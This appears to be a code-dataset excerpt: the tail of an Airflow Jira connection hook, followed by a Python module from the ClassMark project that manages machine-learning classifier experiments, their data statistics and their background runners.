# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from jira import JIRA
from jira.exceptions import JIRAError
from airflow.exceptions import AirflowException
from airflow.hooks.base_hook import BaseHook
class JiraHook(BaseHook):
"""
Jira interaction hook, a Wrapper around JIRA Python SDK.
:param jira_conn_id: reference to a pre-defined Jira Connection
:type jira_conn_id: str
"""
def __init__(self,
jira_conn_id='jira_default',
proxies=None):
super().__init__(jira_conn_id)
self.jira_conn_id = jira_conn_id
self.proxies = proxies
self.client = None
self.get_conn()
def get_conn(self):
if not self.client:
self.log.debug('Creating Jira client for conn_id: %s', self.jira_conn_id)
get_server_info = True
validate = True
extra_options = {}
conn = None
if self.jira_conn_id is not None:
conn = self.get_connection(self.jira_conn_id)
if conn.extra is not None:
extra_options = conn.extra_dejson
# only required attributes are taken for now,
# more can be added ex: async, logging, max_retries
# verify
if 'verify' in extra_options \
and extra_options['verify'].lower() == 'false':
extra_options['verify'] = False
# validate
if 'validate' in extra_options \
and extra_options['validate'].lower() == 'false':
validate = False
if 'get_server_info' in extra_options \
and extra_options['get_server_info'].lower() == 'false':
get_server_info = False
try:
self.client = JIRA(conn.host,
options=extra_options,
basic_auth=(conn.login, conn.password),
get_server_info=get_server_info,
validate=validate,
proxies=self.proxies)
except JIRAError as jira_error:
raise AirflowException('Failed to create jira client, jira error: %s'
% str(jira_error))
except Exception as e:
raise AirflowException('Failed to create jira client, error: %s'
% str(e))
return self.client
| 39.678161
| 89
| 0.563731
|
68f7e758bfc86f1e75721484f5ab66b6d7a45f57
| 42,995
|
py
|
Python
|
classmark/core/experiment.py
|
windionleaf/ClassMark
|
e6019f9abeb99e9a6b72365a508d5a6dac13c3c7
|
[
"Unlicense"
] | null | null | null |
classmark/core/experiment.py
|
windionleaf/ClassMark
|
e6019f9abeb99e9a6b72365a508d5a6dac13c3c7
|
[
"Unlicense"
] | 2
|
2020-09-26T00:56:27.000Z
|
2020-11-13T18:47:16.000Z
|
classmark/core/experiment.py
|
windionleaf/ClassMark
|
e6019f9abeb99e9a6b72365a508d5a6dac13c3c7
|
[
"Unlicense"
] | null | null | null |
"""
Created on 18. 2. 2019
Module for experiment representation and actions.
:author: Martin Dočekal
:contact: xdocek09@stud.fit.vubtr.cz
"""
from ..data.data_set import DataSet
from enum import Enum, auto
import time
from _collections import OrderedDict
from ..core.plugins import Plugin, CLASSIFIERS, FEATURE_EXTRACTORS
from ..core.validation import Validator
from PySide2.QtCore import QThread, Signal
from .results import Results
from typing import Any, Dict, List
import numpy as np
import pandas as pd
from sklearn.metrics import classification_report, accuracy_score
import multiprocessing
import queue
import copy
import statistics
from functools import partial
from .utils import getAllSubclasses, sparseMatVariance, Observable, Logger, Singleton
from .selection import FeaturesSelector
import pickle
from classmark.core.plugins import Classifier
from sklearn.preprocessing import LabelEncoder
import traceback
import os
class LastUsedExperiments(Observable, metaclass=Singleton):
"""
Last used experiments manager. (singleton)
"""
DATA_FILE_PATH = os.path.join(os.path.dirname(os.path.realpath(__file__)), "data", "lastUsed")
MAX_IN_HISTORY = 100
def __init__(self):
"""
Initialization of singleton instance
"""
super().__init__()
self._list = []
if os.path.exists(self.DATA_FILE_PATH):
with open(self.DATA_FILE_PATH, "r+") as file:
filtered = False
for line in file:
p = line.rstrip('\n')
if os.path.exists(p):
self._list.append(p)
else:
# filtered
filtered = True
if filtered:
# write changes
self._listChange()
@property
def list(self):
"""
Get list of last used experiments.
"""
return self._list
def _listChange(self):
"""
Update list content in file.
"""
with open(self.DATA_FILE_PATH, "w") as f:
for p in self._list:
print(p, file=f)
@Observable._event("CHANGE")
def used(self, pathToExp: str):
"""
Inform that experiment on given path was used.
:param pathToExp: Path of given experiment.
:type pathToExp: str
"""
try:
self._list.insert(0, self._list.pop(self._list.index(pathToExp)))
except ValueError:
# not in list yet
self._list.insert(0, pathToExp)
if len(self._list) > self.MAX_IN_HISTORY:
del self._list[-1]
# list changed
self._listChange()
class PluginSlot(object):
"""
Slot that stores informations about selected plugin.
"""
def __init__(self, slotID):
"""
Creates empty classifier slot
:param slotID: Unique identifier of slot.
:type slotID: int
"""
self._id = slotID
self.plugin = None
@property
def id(self):
"""
Slot id.
:return: id
:rtype: int
"""
return self._id
def __eq__(self, other):
if not isinstance(other, __class__):
return False
return self._id == other._id
def __hash__(self):
return self._id
class ExperimentDataStatistics(Observable):
"""
Data statistics of experiment.
"""
def __init__(self):
super().__init__()
self._classSamples = {}
self._classActivity = {}
self._classes = [] # just to give order to the classes
self._attributes = []
self._attributesFeatures = {}
self._attributesAVGFeatureSD = {}
def isActive(self, c):
"""
Determines if given class is active.
:param c: Class for check.
:type c: Any
:return: True active. False otherwise.
:rtype: bool
"""
return self._classActivity[c]
@Observable._event("SAMPLES_CHANGED")
def samplesChangeEvent(self):
"""
Informs all observers that samples stats changed.
This method should be called inside this class only. For others it is just for
observing.
"""
pass
def deactivateClass(self, c):
"""
Deactivating a class means that this class is hidden and is no longer
in properties like classes, classSamples,numberOfSamples, numberOfSamples,
maxSamplesInClass and minSamplesInClass.
:param c: Class from classes.
:type c: Any
"""
self._classActivity[c] = False
self.samplesChangeEvent()
def activateClass(self, c):
"""
Activate class c.
:param c: Class from classes.
:type c: Any
"""
self._classActivity[c] = True
self.samplesChangeEvent()
@property
def attributes(self):
"""
All attributes we have stats for.
:return: List of attributes.
:rtype: List[str]
"""
return self._attributes
@attributes.setter
def attributes(self, attr):
"""
Set all attributes. Is used mainly for the order of these attributes.
WARNING: Cleares attributes metrics.
:param attr: List of attributes.
:type attr: List[str]
"""
self._attributesFeatures = {}
self._attributesAVGFeatureSD = {}
for a in attr:
self._attributesFeatures[a] = 0
self._attributesAVGFeatureSD[a] = 0
self._attributes = attr
@property
def classes(self):
"""
Gives list of all classes.
:return: classes
:rtype: List[Any]
"""
return self._classes
@property
def activeClasses(self):
"""
Gives list of only active classes.
:return: active classes
:rtype: List[Any]
"""
return [c for c in self._classes if self._classActivity[c]]
@property
def classSamples(self):
"""
Number of samples per class in form of dict where key is the class and value
is the number of samples.
"""
return {c: self._classSamples[c] for c in self.activeClasses}
@classSamples.setter
def classSamples(self, newCS: Dict[Any, int]):
"""
Set new class samples.
:param newCS: New number of samples per class.
:type newCS: Dict[Any, int]
"""
self._classSamples = newCS
self._classActivity = {c: True for c in newCS}
self._classes = list(newCS.keys())
self.samplesChangeEvent()
def changeSamplesInClass(self, c, n):
"""
Changes number of samples per class.
:param c: The class.
:type c: Any
:param n: New number of samples in class.
:type n: int
"""
self._classSamples[c] = n
self.samplesChangeEvent()
@property
def numberOfSamples(self):
"""
Number of samples in whole data set.
Is calculated from classSamples.
"""
return sum(self._classSamples[c] for c in self.activeClasses)
@property
def maxSamplesInClass(self):
"""
Gives maximal number of samples in class and also returns the class itself.
:return: maximal number of samples in class and that class
:rtype: Tuple[int, Any]
"""
if len(self.activeClasses) > 0:
mC = max(self.activeClasses, key=lambda x: self._classSamples[x])
return (self._classSamples[mC], mC)
return (0, "")
@property
def minSamplesInClass(self):
"""
Gives minimal number of samples in class and also returns the class itself.
:return: minimal number of samples in class and that class
:rtype: Tuple[int, Any]
"""
if len(self.activeClasses) > 0:
mC = min(self.activeClasses, key=lambda x: self._classSamples[x])
return (self._classSamples[mC], mC)
return (0, "")
@property
def AVGSamplesInClass(self):
"""
Average number of samples in class.
:return: avg samples
:rtype: float
"""
if len(self.activeClasses) > 0:
return sum(self._classSamples[c] for c in self.activeClasses) / len(self.activeClasses)
return 0
@property
def SDSamplesInClass(self):
"""
Standard deviation of number of class samples.
:return: SD of number of class samples
:rtype: float
"""
if len(self.activeClasses) > 1:
return statistics.stdev(self._classSamples[c] for c in self.activeClasses)
return 0
@property
def attributesFeatures(self):
"""
Number of features for every attribute.
"""
return self._attributesFeatures
@property
def attributesAVGFeatureSD(self):
"""
Average standard deviation of features for each attribute.
"""
return self._attributesAVGFeatureSD
class ExperimentLoadException(Exception):
"""
There are some troubles when we are loading experiment.
"""
pass
class Experiment(Observable):
"""
This class represents experiment.
"""
DEFAULT_FEATURE_EXTRACTOR_NAME = "Pass"
"""Name of default feature extractor that is set to attribute.
If exists."""
class AttributeSettings(Enum):
"""
Possible settings types that could be set to an attribute.
"""
USE = 0
PATH = 1
FEATURE_EXTRACTOR = 2
LABEL = 3
def __init__(self, filePath: str = None):
"""
Creation of new experiment or loading of saved.
:param filePath: Path to file. If None than new experiment is created, else
saved experiment is loaded.
:type filePath: str| None
:raise RuntimeError: When there is a problem with plugins.
:raise ExperimentLoadException: When there is a problem with loading.
"""
super().__init__()
self._dataset = None
self._attributesSet = {}
self._label = None
self._featuresSele = []
self._classifiers = [] # classifiers for testing
self._evaluationMethod = None
self.loadSavePath = None # stores path from which this exp was loaded or where is saved
self.results = None
# let's load the plugins that are now available
# must be called before experiment loading
# because sets default values
self._loadPlugins()
if filePath is not None:
# load saved experiment
self._load(filePath)
self.loadSavePath = filePath
self._dataStats = None
self._origDataStats = None
self._attributesThatShouldBeUsedCache = {}
def save(self, filePath):
"""
Saves experiment configuration to given file.
:param filePath: Path to experiment file.
:type filePath: str
"""
with open(filePath, "wb") as saveF:
# let's create Experiment version for saving
data = {
"dataSet": self._dataset,
"attributesSet": self._attributesSet,
"label": self._label,
"featuresSele": self._featuresSele,
"classifiers": self._classifiers,
"evaluationMethod": self._evaluationMethod,
"results": self.results
}
# save it
pickle.dump(data, saveF)
self.loadSavePath = filePath
LastUsedExperiments().used(filePath)
def setResults(self, r):
"""
Sets results. Suitable for use as callback.
:param r: new results.
:type r: Results
"""
self.results = r
def _load(self, filePath):
"""
Loads saved experiment configuration from given file.
:param filePath: Path to experiment file.
:type filePath: str
:raise ExperimentLoadException: When there is a problem with loading.
"""
with open(filePath, "rb") as loadF:
try:
lE = pickle.load(loadF)
except:
raise ExperimentLoadException("Couldn't load given experiment.")
if not isinstance(lE, dict):
raise ExperimentLoadException("Couldn't load given experiment.")
# check that we have loaded all attributes
for a in ["dataSet", "attributesSet", "label", \
"featuresSele", "classifiers", "evaluationMethod"]:
if a not in lE:
raise ExperimentLoadException("Couldn't load given experiment.")
if not isinstance(lE["dataSet"], DataSet):
raise ExperimentLoadException("Couldn't load given experiment.")
self._dataset = lE["dataSet"]
if not isinstance(lE["attributesSet"], dict):
raise ExperimentLoadException("Couldn't load given experiment.")
self._attributesSet = lE["attributesSet"]
if not isinstance(lE["label"], str) and lE["label"] is not None:
raise ExperimentLoadException("Couldn't load given experiment.")
self._label = lE["label"]
if not isinstance(lE["featuresSele"], list) and \
any(not isinstance(fs, FeaturesSelector) for fs in lE["featuresSele"]):
raise ExperimentLoadException("Couldn't load given experiment.")
self._featuresSele = lE["featuresSele"]
if not isinstance(lE["classifiers"], list) and \
any(not isinstance(c, Classifier) for c in lE["classifiers"]):
raise ExperimentLoadException("Couldn't load given experiment.")
self._classifiers = lE["classifiers"]
if not isinstance(lE["evaluationMethod"], Validator):
raise ExperimentLoadException("Couldn't load given experiment.")
self._evaluationMethod = lE["evaluationMethod"]
if lE["results"] is not None and not isinstance(lE["results"], Results):
raise ExperimentLoadException("Couldn't load given experiment.")
self.results = lE["results"]
LastUsedExperiments().used(filePath)
def useDataSubset(self):
"""
Use only defined subset of data.
Subset is defined by selected samples.
Samples are selected according to constraints defined in dataStats.
"""
self._dataset.useSubset(None) # clear the old one
if self._dataStats is not None:
subset = np.empty(self._dataStats.numberOfSamples)
counters = copy.copy(self._dataStats.classSamples)
cnt = 0
for i, sample in enumerate(self._dataset):
l = sample[self._label]
try:
if counters[l] > 0:
counters[l] -= 1
subset[cnt] = i
cnt += 1
except KeyError:
# probably class that we want to omit
pass
self.dataset.useSubset(subset)
@property
def dataStats(self):
"""
The data stats. Working copy of original data stats.
:return: Actual stats.
:rtype: ExperimentDataStatistics | None
"""
return self._dataStats
@property
def origDataStats(self):
"""
Original data stats. Maybe you are looking for working copy
of data stats that you can get with dataStats.
:return: Original data stats.
:rtype: ExperimentDataStatistics | None
"""
return self._origDataStats
@Observable._event("NEW_DATA_STATS")
def setDataStats(self, stats, actOnly=False):
"""
Set the data stats. This method overrides working copy
and original data stats.
:param stats: New stats.
:type stats: ExperimentDataStatistics
:param actOnly: If true than overrides only working copy.
If false than overrides original data to.
If no original data was set (origData is None) than
this parameter is ignored and origData is set too.
:type actOnly: bool
"""
self._dataStats = copy.deepcopy(stats)
if self._origDataStats is None or not actOnly:
self._origDataStats = stats
else:
# We must add classes that were filtered out.
classSamples = self._dataStats.classSamples
deactivate = []
for c in self._origDataStats.classes:
if c not in classSamples:
# we set the max, but we must deactivate it
# The max is set because if user will decide
# that she/he wants to use this class, than
# we must set somu initial number of samples.
classSamples[c] = self._origDataStats.classSamples[c]
deactivate.append(c)
self._dataStats.classSamples = classSamples
# lets deactivate it
for c in deactivate:
self._dataStats.deactivateClass(c)
def _loadPlugins(self):
"""
Loads available plugins.
Adds default.
:raise RuntimeError: When there is problem with plugins.
"""
# available features extractors
if len(FEATURE_EXTRACTORS) == 0:
raise RuntimeError("There are no features extractors plugins.")
feTmp = {}
for fe in FEATURE_EXTRACTORS.values():
if fe.getName() in feTmp:
# wow, name collision
raise RuntimeError("Collision of features extractors names. For name: " + fe.getName())
feTmp[fe.getName()] = fe
# lets put the default feature extractor as the first if exists
if self.DEFAULT_FEATURE_EXTRACTOR_NAME in feTmp:
cont = [(self.DEFAULT_FEATURE_EXTRACTOR_NAME, feTmp[self.DEFAULT_FEATURE_EXTRACTOR_NAME])]
# add the rest
cont += [(n, p) for n, p in feTmp.items() if n != self.DEFAULT_FEATURE_EXTRACTOR_NAME]
self._featuresExt = OrderedDict(cont)
else:
self._featuresExt = OrderedDict(feTmp)
# available classifiers
if len(CLASSIFIERS) == 0:
raise RuntimeError("There are no classifiers plugins.")
clsTmp = set()
for cls in CLASSIFIERS.values():
if cls.getName() in clsTmp:
# wow, name collision
raise RuntimeError("Collision of classifiers names. For name: " + cls.getName())
clsTmp.add(cls.getName())
# available Validators
self.availableEvaluationMethods = getAllSubclasses(Validator)
self._evaluationMethod = self.availableEvaluationMethods[0]() # add default
# available Features selectors
self.availableFeatureSelectors = getAllSubclasses(FeaturesSelector)
@property
def featuresSelectors(self):
"""
Features selectors for feature selecting.
"""
return [s.plugin for s in self._featuresSele]
@property
def featuresSelectorsSlots(self):
"""
All used features selectors slots.
"""
return self._featuresSele
@property
def classifiersSlots(self):
"""
All curently used classifiers slots.
"""
return self._classifiers
@property
def classifiers(self):
"""
Classifiers for testing.
"""
return [s.plugin for s in self._classifiers]
def newClassifierSlot(self):
"""
Creates new slot for classifier that should be tested.
:return: Classifier slot
:rtype: PluginSlot
"""
return self._addPluginSlot(self._classifiers)
def removeClassifierSlot(self, slot: PluginSlot):
"""
Remove classifier slot.
:param slot: Slot for classifier.
:type slot:PluginSlot
"""
self._removePluginSlot(self._classifiers, slot)
def newFeaturesSelectorSlot(self):
"""
Creates new slot for features selector that should be tested.
:return: Features selector slot
:rtype: PluginSlot
"""
return self._addPluginSlot(self._featuresSele)
def removeFeaturesSelectorSlot(self, slot: PluginSlot):
"""
Remove features selector slot.
:param slot: Slot for features selector.
:type slot: PluginSlot
"""
self._removePluginSlot(self._featuresSele, slot)
def _addPluginSlot(self, bank):
"""
Creates new slot in given slot bank.
:param bank: Slot bank
:type bank: List[PluginSlot]
:return: New slot
:rtype: PluginSlot
"""
# lets find first empty id
slotId = 0 if len(bank) == 0 else max(p.id for p in bank) + 1
bank.append(PluginSlot(slotId))
return bank[-1]
def _removePluginSlot(self, bank: List[PluginSlot], slot: PluginSlot):
"""
Creates new slot in given slot bank.
:param bank: Slot bank
:type bank: List[PluginSlot]
:param slot: Slot that should be removed.
:type slot: PluginSlot
"""
bank.remove(slot)
@property
def availableClassifiers(self):
"""
Available classifiers plugins.
"""
return CLASSIFIERS
@property
def featuresExt(self):
"""
Available features extractors plugins.
Stored in OrderedDict (name -> plugin). Because it is handy to have default extractor as first
(if exists).
"""
return self._featuresExt
@Observable._event("NEW_DATA_SET")
def loadDataset(self, filePath: str):
"""
Loades dataset.
:param filePath: Path to file with dataset.
:type filePath: str
"""
self._dataset = DataSet(filePath)
# prepare new attribute settings
self._attributesSet = {
name: {self.AttributeSettings.USE: True, self.AttributeSettings.PATH: False,
self.AttributeSettings.FEATURE_EXTRACTOR: next(iter(self._featuresExt.values()))()}
for name in self._dataset.attributes}
self._label = None
self._dataStats = None
self._attributesThatShouldBeUsedCache = {}
@property
def evaluationMethod(self):
"""
Validator used for evaluation.
"""
return self._evaluationMethod
@evaluationMethod.setter
def evaluationMethod(self, val):
"""
Validator used for evaluation.
:param val: Validtor or name of validator class.
If name of validator is provided than new object of it's corresponding class is created.
:type val:str|Validator
:raise ValueError: When invalid value is given (unknown name).
"""
if isinstance(val, Validator):
self._evaluationMethod = val
else:
# self.availableEvaluationMethods is a list because we want to preserve order and therefore
# we have no other choice than to iterate over it and find the right by name.
for v in self.availableEvaluationMethods:
if v.getName() == val:
self._evaluationMethod = v()
return
raise ValueError("Unknown Validator name: " + val)
def setEvaluationMethod(self, val):
"""
Same as evaluationMethod but can be used as callable
:param val: Validtor or name of validator class.
If name of validator is provided than new object of it's corresponding class is created.
:type val:str|Validator
:raise ValueError: When invalid value is given (unknown name).
"""
self.evaluationMethod = val
@property
def label(self):
"""
Attribute name that is set as label or None.
"""
return self._label
def getAttributeSetting(self, attribute: str, t):
"""
Get attribute setting of given type.
:param attribute: The attribute.
:type attribute: str
:param t: The setting type.
:type t: Experiment.AttributeSettings
"""
if t == Experiment.AttributeSettings.LABEL:
return self._label == attribute
return self._attributesSet[attribute][t]
@Observable._event("ATTRIBUTES_CHANGED")
def attributesChangedEvent(self):
"""
This event exists for informing observers that some attribute is no longer used
or started to be used or when attribute is marked as label.
"""
pass
def setAttributeSetting(self, attribute: str, t, val):
"""
Set attribute setting of given type.
:param attribute: The attribute.
:type attribute: str
:param t: The setting type.
:type t: Experiment.AttributeSettings
:param val: New value. For setting new label val must be true, because if you pass false than
label will be set to None.
:type val: bool | Plugin
:raise KeyError: When the name of attribute is uknown.
"""
if t == Experiment.AttributeSettings.LABEL:
self._label = attribute if val else None
# setting new label invalidates data stats
self.setDataStats(None)
else:
self._attributesSet[attribute][t] = val
if t == Experiment.AttributeSettings.PATH:
# we must inform the data set object
if val:
self._dataset.addPathAttribute(attribute,
self._attributesSet[attribute][
Experiment.AttributeSettings.FEATURE_EXTRACTOR].expDataType())
else:
self._dataset.removePathAttribute(attribute)
if t == Experiment.AttributeSettings.FEATURE_EXTRACTOR and \
attribute in self._dataset.pathAttributes:
# we must inform the data set object
self._dataset.addPathAttribute(attribute, val.expDataType())
if t == Experiment.AttributeSettings.USE or t == Experiment.AttributeSettings.LABEL:
self._attributesThatShouldBeUsedCache = {}
self.attributesChangedEvent()
def attributesThatShouldBeUsed(self, label: bool = True):
"""
Names of attributes that should be used.
:param label: True means that label attribute should be among them.
:type label: bool
"""
# we are preserving original attribute order
try:
return self._attributesThatShouldBeUsedCache[label]
except KeyError:
res = [a for a in self.dataset.attributes \
if self._attributesSet[a][Experiment.AttributeSettings.USE] and (label or a != self._label)]
self._attributesThatShouldBeUsedCache[label] = res
return res
@property
def dataset(self):
"""
Loaded dataset.
"""
return self._dataset
class ExperimentBackgroundRunner(QThread):
"""
Base class for background tasks.
Defines all mandatory signals.
"""
numberOfSteps = Signal(int)
"""Signalizes that we now know the number of steps. Parameter is number of steps."""
step = Signal()
"""Next step finished"""
actInfo = Signal(str)
"""Sends information about what thread is doing now."""
error = Signal(str, str)
"""Sends information about error that cancels background worker.
First string is short error message and second is detailed error description."""
log = Signal(str)
"""Sends log message that should be shown in GUI."""
class MultPMessageType(Enum):
"""
Message type for multiprocessing communication.
"""
NUMBER_OF_STEPS_SIGNAL = auto()
"""Signalizes that we now know the number of steps. Value is number of steps (int)."""
STEP_SIGNAL = auto()
"""Next step finished. Value None."""
ACT_INFO_SIGNAL = auto()
"""Sends information about what process is doing now. Value is string."""
LOG_SIGNAL = auto()
"""Sends log message that should be shown in GUI."""
RESULT_SIGNAL = auto()
"""Sends experiment results."""
ERROR_SIGNAL = auto()
"""Sends information about error that cancels background worker.
To queue pass tuple with message and detailed message in that order.
If you want to pass just message, than pass it just like regular string."""
def __init__(self, experiment: Experiment):
"""
Initialization of background worker.
:param experiment: Work on that experiment.
:type experiment: Experiment
"""
QThread.__init__(self)
self._experiment = copy.copy(experiment)
# remove thinks that are no longer useful
self._experiment.clearObservers()
saveObservers = None
saveObserversOrig = None
if self._experiment.dataStats is not None:
saveObservers = self._experiment.dataStats.observers
self._experiment.dataStats.clearObservers()
if self._experiment.origDataStats is not None:
saveObserversOrig = self._experiment.origDataStats.observers
self._experiment.origDataStats.clearObservers()
# no we can make deep copy
self._experiment = copy.deepcopy(self._experiment)
# return original observers
if saveObservers is not None:
experiment.dataStats.observers = saveObservers
if saveObserversOrig is not None:
experiment.origDataStats.observers = saveObserversOrig
def run(self):
"""
Run the background work.
Default implementation that creates new process with which communicates via queue.
The true work must be implemented in work method.
"""
try:
commQ = multiprocessing.Queue()
p = multiprocessing.Process(target=partial(self.work, self._experiment, commQ))
p.start()
while not self.isInterruptionRequested() and p.is_alive():
try:
msgType, msgValue = commQ.get(True, 0.5) # blocking
self.processMultPMsg(msgType, msgValue)
except queue.Empty:
# nothing here
pass
if p.is_alive():
p.terminate()
while True: # is something still in queue?
try:
msgType, msgValue = commQ.get(True, 0.5) # blocking
self.processMultPMsg(msgType, msgValue)
except queue.Empty:
# nothing here
break
except Exception as e:
# error
self.error.emit(str(e), traceback.format_exc())
@classmethod
def work(cls, experiment: Experiment, commQ: multiprocessing.Queue):
"""
The actual work of that thread
:param experiment: Work on that experiment.
:type experiment: Experiment
:param commQ: Communication queue.
:type commQ: multiprocessing.Queue
"""
raise NotImplemented("Please implement the work method")
def processMultPMsg(self, msgType, msgVal: Any):
"""
Processes message received from another process.
Sends appropriate signals to UI thread.
:param msgType: Type of received message.
:type msgType: MultPMessageType
:param msgVal: The message.
:type msgVal: Any
:return: Returns True if emits an signal. False otherwise.
:rtype: bool
"""
if msgType == self.MultPMessageType.NUMBER_OF_STEPS_SIGNAL:
self.numberOfSteps.emit(msgVal)
elif msgType == self.MultPMessageType.STEP_SIGNAL:
self.step.emit()
elif msgType == self.MultPMessageType.ACT_INFO_SIGNAL:
self.actInfo.emit(msgVal)
elif msgType == self.MultPMessageType.LOG_SIGNAL:
self.log.emit(msgVal)
elif msgType == self.MultPMessageType.ERROR_SIGNAL:
if isinstance(msgVal, str):
self.error.emit(msgVal, None)
else:
self.error.emit(msgVal[0], msgVal[1])
else:
return False
return True
class ExperimentStatsRunner(ExperimentBackgroundRunner):
"""
Runs the stats calculation in it's own thread.
"""
calcStatsResult = Signal(ExperimentDataStatistics)
"""Sends calculated statistics."""
@classmethod
def work(cls, experiment: Experiment, commQ: multiprocessing.Queue):
"""
Stats calculation.
:param experiment: Work on that experiment.
:type experiment: Experiment
:param commQ: Communication queue.
:type commQ: multiprocessing.Queue
"""
try:
experiment.useDataSubset()
statsExp = ExperimentDataStatistics()
statsExp.attributes = experiment.attributesThatShouldBeUsed(False)
# reading, samples, attributes
commQ.put((cls.MultPMessageType.NUMBER_OF_STEPS_SIGNAL, 2 + len(statsExp.attributes)))
commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, "dataset reading"))
# ok, lets first read the data
data, labels = experiment.dataset.toNumpyArray([
statsExp.attributes,
[experiment.label]
])
if data.shape[0] == 0:
# no data
commQ.put((cls.MultPMessageType.ERROR_SIGNAL, ("no data", "Given data set does not have any samples.")))
return
labels = labels.ravel() # we need row vector
commQ.put((cls.MultPMessageType.STEP_SIGNAL, None))
commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, "samples counting"))
classSamples = {}
classes, samples = np.unique(labels, return_counts=True)
for actClass, actClassSamples in zip(classes, samples):
classSamples[actClass] = actClassSamples
statsExp.classSamples = classSamples
# extractors mapping
extMap = [(a, experiment.getAttributeSetting(a, Experiment.AttributeSettings.FEATURE_EXTRACTOR)) \
for a in experiment.attributesThatShouldBeUsed(False)]
commQ.put((cls.MultPMessageType.STEP_SIGNAL, None))
# get the attributes values
for i, (attr, extractor) in enumerate(extMap):
commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, "attribute: " + attr))
actF = extractor.fitAndExtract(data[:, i], labels).tocsc()
statsExp.attributesFeatures[attr] = actF.shape[1]
statsExp.attributesAVGFeatureSD[attr] = np.average(
np.array([(sparseMatVariance(actF[:, c])) ** 0.5 for c in range(actF.shape[1])]))
commQ.put((cls.MultPMessageType.STEP_SIGNAL, None))
commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, "Done"))
commQ.put((cls.MultPMessageType.RESULT_SIGNAL, statsExp))
except Exception as e:
# error
commQ.put((cls.MultPMessageType.ERROR_SIGNAL, (str(e), traceback.format_exc())))
finally:
commQ.close()
commQ.join_thread()
def processMultPMsg(self, msgType, msgVal: Any):
"""
Processes message received from another process.
Sends appropriate signals to UI thread.
:param msgType: Type of received message.
:type msgType: MultPMessageType
:param msgVal: The message.
:type msgVal: Any
:return: Returns True if emits an signal. False otherwise.
:rtype: bool
"""
if not super().processMultPMsg(msgType, msgVal):
if msgType == self.MultPMessageType.RESULT_SIGNAL:
self.calcStatsResult.emit(msgVal)
else:
return False
return True
return False
class ExperimentRunner(ExperimentBackgroundRunner):
"""
Runs experiment in it's own thread.
"""
result = Signal(Results)
"""Send signal with experiment results."""
@classmethod
def work(cls, experiment: Experiment, commQ: multiprocessing.Queue):
"""
The actual work of that thread.
:param experiment: Work on that experiment.
:type experiment: Experiment
:param commQ: Communication queue.
:type commQ: multiprocessing.Queue
"""
try:
experiment.useDataSubset()
# remove thinks that are no longer useful
experiment.setDataStats(None)
commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, "dataset reading"))
logger = Logger() # get singleton instance of logger
# reg event
logger.registerObserver("LOG",
lambda logMsg: commQ.put((cls.MultPMessageType.LOG_SIGNAL, logMsg)))
# ok, lets first read the data
data, labels = experiment.dataset.toNumpyArray([
experiment.attributesThatShouldBeUsed(False),
[experiment.label]
])
if data.shape[0] == 0:
# no data
commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, "no data"))
return
labels = labels.ravel() # we need row vector
lEnc = LabelEncoder()
# let's encode labels to save some memory space
# also this is more suitable representation for some classifiers such as neural networks
labels = lEnc.fit_transform(labels)
# extractors mapping
extMap = [experiment.getAttributeSetting(a, Experiment.AttributeSettings.FEATURE_EXTRACTOR) \
for a in experiment.attributesThatShouldBeUsed(False)]
# create storage for results
steps = experiment.evaluationMethod.numOfSteps(experiment.dataset, data, labels)
commQ.put((cls.MultPMessageType.NUMBER_OF_STEPS_SIGNAL,
(len(experiment.classifiers) * 2 + experiment.evaluationMethod.NUMBER_OF_FEATURES_STEP) * (
steps) + 1))
# +1 reading
# len(experiment.classifiers)*2 one step for testing and one for training of one classifier
commQ.put((cls.MultPMessageType.STEP_SIGNAL, None)) # because reading is finished
resultsStorage = Results(steps, experiment.classifiers, lEnc)
for step, c, predicted, importantFeatures, importanceOfFeatures, realLabels, testIndices, \
stepTimes, stats in experiment.evaluationMethod.run(experiment.dataset, experiment.classifiers,
data, experiment.attributesThatShouldBeUsed(False),
labels, extMap, experiment.featuresSelectors,
cls.nextSubStep(commQ)):
if resultsStorage.steps[step].labels is None:
# because it does not make much sense to have true labels stored for each predictions
# we store labels just once for each validation step
resultsStorage.steps[step].labels = realLabels
resultsStorage.steps[step].addResults(c, predicted, importantFeatures, importanceOfFeatures,
testIndices, stepTimes, stats)
transRealLabels = lEnc.inverse_transform(realLabels)
transPredictedLabels = lEnc.inverse_transform(predicted)
cls.writeConfMat(transPredictedLabels, transRealLabels)
logger.log(classification_report(transRealLabels,
transPredictedLabels))
logger.log("accuracy\t{}".format(accuracy_score(realLabels, predicted)))
logger.log("\n\n")
resultsStorage.finalize() # for better score calculation
commQ.put((cls.MultPMessageType.RESULT_SIGNAL, resultsStorage))
except Exception as e:
# error
commQ.put((cls.MultPMessageType.ERROR_SIGNAL, (str(e), traceback.format_exc())))
finally:
commQ.close()
commQ.join_thread()
@classmethod
def nextSubStep(cls, commQ: multiprocessing.Queue):
"""
Informs UI about next substep.
:param commQ: Communication queue.
:type commQ: multiprocessing.Queue
"""
def x(msg):
commQ.put((cls.MultPMessageType.ACT_INFO_SIGNAL, msg))
commQ.put((cls.MultPMessageType.STEP_SIGNAL, None))
return x
def processMultPMsg(self, msgType, msgVal: Any):
"""
Processes message received from another process.
Sends appropriate signals to UI thread.
:param msgType: Type of received message.
:type msgType: MultPMessageType
:param msgVal: The message.
:type msgVal: Any
:return: Returns True if emits an signal. False otherwise.
:rtype: bool
"""
if not super().processMultPMsg(msgType, msgVal):
if msgType == self.MultPMessageType.RESULT_SIGNAL:
self.result.emit(msgVal)
else:
return False
return True
return False
@staticmethod
def writeConfMat(predicted, labels):
pd.set_option('display.expand_frame_repr', False)
pd.set_option('display.max_rows', None)
pd.set_option('display.max_columns', None)
pd.set_option('display.max_colwidth',
len(max(predicted, key=len)) if len(max(predicted, key=len)) > len(max(labels, key=len)) else len(
max(labels, key=len)))
Logger().log(str(pd.crosstab(pd.Series(labels), pd.Series(predicted), rownames=['Real'], colnames=['Predicted'],
margins=True)))
| 32.820611
| 120
| 0.588627
|
74e480be8e85798accbb27173976341c3e1382fe
| 1,933
|
py
|
Python
|
msemu/server.py
|
sgherbst/msemu
|
a99f1380c707d34ddc4554b09db50c6d24605838
|
[
"MIT"
] | 2
|
